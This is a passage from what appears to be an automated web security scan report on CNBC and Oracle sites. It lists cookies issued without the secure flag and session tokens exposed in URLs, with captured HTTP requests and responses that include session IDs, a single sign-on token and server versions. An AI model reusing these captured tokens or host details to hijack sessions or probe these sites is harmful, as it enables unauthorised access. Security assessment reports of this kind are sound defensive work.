HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "1756a-46941f222cbc0" Accept-Ranges: bytes Content-Length: 95594 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ /* Prototype JavaScript framework, version 1.5.0 * (c) 2005-2007 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
7.61. https://register.cnbc.com/js/registrationBasic.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationBasic.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationBasic.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT ETag: "3e22-47d9ed5f8cdc0" Accept-Ranges: bytes Content-Length: 15906 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ //Field Validations - start var goOptions = true; var goAddrs1 = true; var goAddrs2 = true; var goPhone = true; var goHhi = true; var goIndustry = true; var goStDsc = true; var goCity = true;...[SNIP]...
7.62. https://register.cnbc.com/js/registrationUtils.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationUtils.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationUtils.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Tue, 11 Aug 2009 10:38:41 GMT ETag: "7cf-470db4e522e40" Accept-Ranges: bytes Content-Length: 1999 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ function toggleMessage(show, hide1, hide2){ var showObj = document.getElementById(show); var hideObj1 = document.getElementById(hide1); var hideObj2 = document.getElementById(hide2); hideObj1....[SNIP]...
7.63. https://register.cnbc.com/js/registrationValidations.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/registrationValidations.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/registrationValidations.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:35 GMT ETag: "1dac-47d9ed5f8cdc0" Accept-Ranges: bytes Content-Length: 7596 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ //Field Validations - start var goEmail = true; var goEmailConf = true; var goPwd = true; var goPwdConf = true; var goSecQstn = true; var goSecAns = true; var goScrnNm = true; var goFrstNm = true; var...[SNIP]...
7.64. https://register.cnbc.com/js/s_code.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/s_code.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/s_code.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:51 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "68d6-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 26838 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:51 GMT; path=/ /* SiteCatalyst code version: H.2. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here FEBRUARY 19 2008 UPDATE NBCU CMJ...[SNIP]...
7.65. https://register.cnbc.com/js/validation.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/validation.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/validation.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 29 Jul 2009 18:48:54 GMT ETag: "184e-46fdca3891180" Accept-Ranges: bytes Content-Length: 6222 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ // JavaScript Document Validation = Class.create(); Validation.prototype = { initialize: function(parameters, timeout, controls, responsetxt ){ this.parameters = this.generateParameterList(...[SNIP]...
7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/quote-html-webservice/fvquote.htm
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/fvquote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 231 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/fvquote.htm was not found on t...[SNIP]...
7.67. https://register.cnbc.com/quote-html-webservice/quote.htm
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/quote-html-webservice/quote.htm
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quote-html-webservice/quote.htm HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 229 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /quote-html-webservice/quote.htm was not found on thi...[SNIP]...
7.68. https://register.cnbc.com/refreshlogin.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/refreshlogin.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/ HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:06 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header Content-Length: 0 Connection: close Content-Type: text/plainSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:06 GMT; path=/
8. Session token in URL
previous
next
There are 42 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://blogs.oracle.com
Path:
/roller-ui/cwpLogin.jsp
Issue detail
The response contains the following links that appear to contain session tokens:https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682
Request
GET /roller-ui/cwpLogin.jsp HTTP/1.1 Host: blogs.oracle.com Proxy-Connection: keep-alive Referer: http://blogs.oracle.com/otn/entry/bea_welcome_and_oracles_middle User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; JSESSIONID=N62MTmHFyVjP3vlZCyTSrpWsKDhTVl78pvQh5p14CnPctL0GvTWg!682060306; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682 X-Robots-Tag: noindex,follow X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Content-Language: en X-Oracle-DMS-ECID: 51624319760812530 Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51624319760812530,0:1) Content-Length: 1065 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:16:18 GMT Connection: close Set-Cookie: OHS-blogs.oracle.com=; path=/ <html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3CA7C179F2B6A77573D5C53030D02597238CD1C3E0212AE912A5703E640DF935186B51AB3DFAEEE7B2A7E20FF4542015DBB0457891C5A4461CB4B4A23EB51909CE24B245C0A7CB1A8EBE5AC1C84D4342665B366BF177D22BAC7C46B7421C202F9871EF6C385B9C84ABA7DAB0DE4470E2A9204FA9C682"> https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~15AB5291~CA7268AF16FDDCD6192ED08700B7C3B3CA2E1B23878BCD93247A950FAAA266F9D7A7C11B2586EEC1681E7C0613B1F158706D3C...[SNIP]...
8.2. https://forums.oracle.com/forums/category.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/category.jspa
Issue detail
The response contains the following links that appear to contain session tokens:https://forums.oracle.com/forums/category.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18 https://forums.oracle.com/forums/guestsettings!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/help.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/index.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=84 https://forums.oracle.com/forums/login!withRedirect.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/search!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/style/style.jsp;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re010g?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re011g?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re09i?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0apex?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0database?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0dba?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0error?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0installation?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0oracle?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0performance?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0pl_sql?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0plsql?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0report?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0rman?categoryID=18 https://forums.oracle.com/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0sql?categoryID=18 https://forums.oracle.com/forums/tags;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18 https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b https://forums.oracle.com/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 https://forums.oracle.com/forums/themes/english/resources/style.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/category.jspa?categoryID=18 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 123998 Date: Tue, 06 Sep 2011 16:13:12 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: JSESSIONID=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; path=/forums Set-Cookie: BIGipServerforums_prod_pool=202412685.20480.0000; path=/ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Database</title> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <link rel="stylesheet" type="text/css" href="/forums/style/style.jsp;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" /> <link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/style.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" /> <link rel="stylesheet" type="text/css" href="/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" /> <link rel="alternate" type="application/rss+xml" title="RSS" href="http://forums.oracle.com/forums/rss/rssmessages.jspa?categoryID=18">...[SNIP]... <A HREF="http://www.oracle.com/technology/index.html"><IMG SRC="/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" hspace="10" BORDER=0 ALT="Forums.Oracle.com"> </a>...[SNIP]... <br><IMG alt="" src="/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" width=1 height=8 border=0> </td>...[SNIP]... <em> <a href="/forums/index.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=84"> Forum Home</a> » <a href="/forums/category.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18"> Database</a>...[SNIP]... <td class="jive-acc-login"> <a href="/forums/login!withRedirect.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0"> Sign In</a>...[SNIP]... <td class="jive-acc-cp"><a href="/forums/guestsettings!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0"> Guest Settings</a>...[SNIP]... 